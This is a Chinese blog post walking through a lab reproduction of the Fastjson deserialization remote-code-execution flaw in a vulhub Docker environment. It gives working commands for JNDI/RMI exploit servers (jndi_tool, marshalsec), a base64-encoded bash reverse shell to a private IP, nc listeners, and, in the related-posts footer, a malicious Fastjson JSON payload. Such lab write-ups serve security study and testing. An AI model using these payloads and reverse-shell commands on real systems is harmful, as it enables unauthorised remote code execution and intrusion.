Fastjson漏洞复现

于 2023-12-11 16:12:20 发布
阅读量452 收藏 8
点赞数 7
文章标签: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunyufei_666/article/details/133176485
版权

本次复现用的是vulhub环境搭建的环境

首先下载vulhub环境,进入fastjson环境中

docker-compose up -d

下载好环境后就可以使用了,如果中途报错可以重启docker服务

1.采用jndi+rmi的方式进行RCE

这里使用jndi_tool.jar工具,下载工具

wget https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/jndi_tool.jar

这里命令是固定的,需要把反弹shell的脚本进行base64加密

java -cp jndi_tool.jar jndi.HRMIServer 192.168.27.132 6666 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI3LjEzMi85OTk5ICAwPiYx}|{base64,-d}|{bash,-i}"

nc接受反弹shell

启动服务后,构造payload

成功反弹shell

2.采用marshalsec的方式进行RCE

下载marshalsec

GitHub - mbechler/marshalsec

下载后进入pom.xml文件所在的目录进行maven打包

打包成功后在target文件中生成marshalsec-0.0.3-SNAPSHOT-all.jar工具

启动marshalsec

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.27.132:4444/#Shell" 9999


其中http://192.168.27.132:4444/#Shell 是存放反弹shell的class文件的http服务

nc接受shell

成功反弹shell

sunyufei_666
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fastjson 漏洞利用技巧
05-08 2799
每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。01、自动化漏洞检测一款基于BurpSuite的被动式FastJson检测插件,这个插件会对BurpSuite传进来的带有json数据的请求包进行检测。Github项目地址:https://gi...
jndi-tool JNDI服务利用工具
01-06
JNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具
老生常谈的fastjson安全问题,从实战深入反序列化漏洞原理
2201_75353421的博客
06-20 2435
反序列化是java安全er避不开的技能点,也是非常难的一个点。这里我就先从我实战中遇到最多也是自己最熟悉的fastjson开始,这个漏洞老生长谈了,不过只要遇到就真是一个很好的点了。这里我先从效果开始再转战到原理,因为如果不懂代码,上来就分析代码就会让人望而却步。直接从漏洞利用开始,溯源到原理反倒是我这种非安全研究er的最好学习方式。
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2438
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
JNDI注入+高版本绕过+工具使用
GalaxySpaceX的博客
06-21 2512
JNDI注入+高版本绕过+工具使用
JNDIExploit使用方法
qq_50854662的博客
02-28 3795
JNDIExploit使用方法
FastJson 漏洞.md
05-27
#### 二、Fastjson漏洞概述 Fastjson在多个版本中存在安全漏洞,主要集中在反序列化过程中,这些漏洞可能允许远程代码执行(RCE),即攻击者可以通过构造恶意的JSON数据来触发漏洞,进而执行任意代码。此类漏洞一旦...
fastjson1.2.24反序列化RCE
最新发布
06-24
然后在`src`目录下编写Java代码,实现漏洞复现: ```java import com.alibaba.fastjson.JSON; import java.lang.invoke.MethodHandle; public class Exploit { public static void main(String[] args) { String...
jndi用到的所有jar
03-31
jndi数据源(保证最全的jar),是一个标准化的配置,尤其在用到websphere容器时,一定会用到,这时我们写java工程,就会用到它。
jndi所依赖的jar包
11-17
jndi所依赖的jar包,fscontext.jar和providerutil.jar,jndi.jar 将jndi.jar复制到%JAVA_HOME%\jre\lib\ext目录下就可得到持久的扩展
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
Fastjson历史漏洞复现
懂进攻知防守
07-27 1391
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...
Java 使用 JNDI 服务
xianYiSkill
12-03 2106
Java 使用 JNDI 详解JNDI 简述使用 JNDI 步骤 JNDI 简述 JNDI 是一个标准的 java 扩展,它提供了一个统一的 API,用于访问多种目录和命名服务。在这方面,它和 JDBC 有点类似。JDBC 编写的代码,可以访问不同的数据库,比如:oracle、sqlserver、mysql等。而 JNDI 编写的代码,可以访问不同的目录或命名服务,比如:LDAP、DNS、JMS ...
fastjson 1.2.47 远程命令执行漏洞
weixin_42786460的博客
10-14 518
fastjson 1.2.47 远程命令执行漏洞
fastjson漏洞复现
09-11
Fastjson 是一个针对Java对象和JSON数据进行转换的Java类库,但是在处理JSON字符串时存在一些安全漏洞。其中最常见的是反序列化漏洞,攻击者可以通过构造恶意的JSON字符串来执行任意代码。下面是一个简单的Fastjson反序列化漏洞复现过程: 1. 下载 Fastjson 的 jar 包,将其加入项目的 classpath 中。 2. 构造一个恶意的 JSON 字符串,例如: ```json {"@type":"java.lang.AutoCloseable","@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} ``` 3. 使用 Fastjson 将 JSON 字符串反序列化为 Java 对象,并执行其中的代码: ```java String json = "{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\",\"autoCommit\":true}"; Object obj = JSON.parse(json); ``` 这段代码会将 JSON 字符串反序列化为一个 Java 对象,并执行其中的任意代码,包括远程代码执行等恶意行为。 需要注意的是,Fastjson 的反序列化漏洞并不是固定的,具体的漏洞形式与使用的 Fastjson 版本有关。因此,在使用 Fastjson 时,需要及时更新到最新版本以避免安全漏洞。同时,不要在应用程序中接受来自用户输入的 JSON 数据,以免受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值